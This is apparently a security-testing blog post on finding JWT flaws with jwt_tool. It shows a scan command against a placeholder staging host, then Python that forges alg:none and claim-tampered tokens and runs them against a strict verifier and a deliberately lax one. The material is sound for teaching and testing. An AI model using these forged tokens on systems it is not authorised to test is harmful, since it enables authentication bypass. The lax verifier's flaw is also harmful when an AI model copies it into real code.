# Week 40 - JWT Testing

Looking for a quick way to test JSON Web Tokens (JWTs) during an [#AppSec](https://www.linkedin.com/feed/hashtag/?keywords=appsec\&highlightedUpdateUrns=urn%3Ali%3Aactivity%3A6988868624044191744) engagement?

I highly recommend using jwt\_tool! To get it running, locate a GET request to an authenticated endpoint that sends a JWT in the Authorization header, then run the following command (the host below is a placeholder; only point it at targets you are authorised to test):

`python3 jwt_tool.py -M at -t "https[:]//staging[.]client[.]com/api/v3/endpoint" -rh "Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciO…<more>"`

The -M option sets the scanning mode; `at` runs all tests. The -t option is the target URL. The -rh option adds a request header to every request it sends, in this case the Authorization header carrying the JWT, which is also where jwt\_tool picks the token up from. For each tampered token it reports the response code and length, so pick an endpoint whose response visibly changes when a token is rejected or its claims are altered, otherwise every forgery will look like a hit.

Then let it rip! It will automatically try the known exploits (alg:none, null signature, key confusion, JWKS spoofing), fuzz existing and common claims, and flag token misconfigurations, leaving you more time for that business logic! `at` mode sends a lot of requests and includes the exploit payloads, so keep it on staging and read the results with the baseline response in mind rather than trusting every "accepted" line.

Let me know what tools you use for [#JWT](https://www.linkedin.com/feed/hashtag/?keywords=jwt\&highlightedUpdateUrns=urn%3Ali%3Aactivity%3A6988868624044191744) testing in the comments below.

![](https://3053998085-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FxZo6Sim2dDXChJQAtNXN%2Fuploads%2FCskwzly4UfTvti54pLMT%2Fimage.png?alt=media\&token=deabc4db-38e6-4b66-92e3-90b4c795a0f8)
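To make concrete what "common exploits" and "claim fuzzing" mean under the hood, here is an added example (not code from jwt\_tool or from this post) that builds the two simplest forgeries a JWT scanner sends, an alg:none token with the signature dropped and a payload edit that keeps the original signature, and runs them against a strict verifier and a deliberately lax one. The HMAC key, the claims and both verifier functions are constructed for the example; there is no network call, so it runs offline.

```python
import base64
import hashlib
import hmac
import json

# Constructed sample key for this example; on a real engagement you never hold the server secret.
KEY = b"example-hmac-secret-do-not-reuse"


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def encode_part(obj: dict) -> str:
    # Compact JSON, the form real JWT libraries emit
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def decode_jwt(token: str):
    """Split a compact JWT into (header dict, payload dict, raw signature bytes)."""
    h, p, s = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p)), b64url_decode(s)


def sign_hs256(header: dict, payload: dict, key: bytes) -> str:
    signing_input = f"{encode_part(header)}.{encode_part(payload)}"
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def alg_none_variants(token: str) -> list:
    """alg:none forgeries: rewrite the header alg and drop the signature.
    Case variants are included because some libraries compare alg case-insensitively."""
    header, payload, _ = decode_jwt(token)
    return [f"{encode_part(dict(header, alg=alg))}.{encode_part(payload)}."
            for alg in ("none", "None", "NONE", "nOnE")]


def tamper_claim(token: str, claim: str, value) -> str:
    """Change one payload claim but keep the original signature: tests whether the signature is checked at all."""
    h, p, s = token.split(".")
    payload = json.loads(b64url_decode(p))
    payload[claim] = value
    return f"{h}.{encode_part(payload)}.{s}"


def verify_strict(token: str, key: bytes):
    """Correct verifier: pins the algorithm, rejects anything else, constant-time signature compare."""
    header, payload, sig = decode_jwt(token)
    if header.get("alg") != "HS256":
        return False, None
    signing_input = token.rsplit(".", 1)[0]
    expected = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(sig, expected):
        return False, None
    return True, payload


def verify_lax(token: str, key: bytes):
    """Deliberately weak verifier that trusts the header's alg: the bug the alg:none test finds."""
    header, payload, sig = decode_jwt(token)
    alg = str(header.get("alg", ""))
    if alg.lower() == "none":
        return True, payload  # unsigned token accepted on the token's own say-so
    if alg == "HS256":
        return verify_strict(token, key)
    return False, None


def audit(token: str, verifier, key: bytes) -> dict:
    """Send the forgeries to a verifier; True means a forged token was accepted, i.e. a finding."""
    findings = {}
    for i, forged in enumerate(alg_none_variants(token)):
        findings[f"alg_none_{i}"] = verifier(forged, key)[0]
    findings["claim_tamper"] = verifier(tamper_claim(token, "role", "admin"), key)[0]
    return findings


if __name__ == "__main__":
    token = sign_hs256({"typ": "JWT", "alg": "HS256"}, {"sub": "1001", "role": "user"}, KEY)
    print("strict:", audit(token, verify_strict, KEY))  # all False
    print("lax:   ", audit(token, verify_lax, KEY))     # alg_none_* True, claim_tamper False
```

The lax verifier still catches the edited claim because it does check HS256 signatures; it only falls over when the header tells it not to sign at all, which is exactly why a scanner tries every case spelling of `none` rather than just one. When jwt\_tool reports a different response code or length for one of these tokens, this is the class of bug you are looking at.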
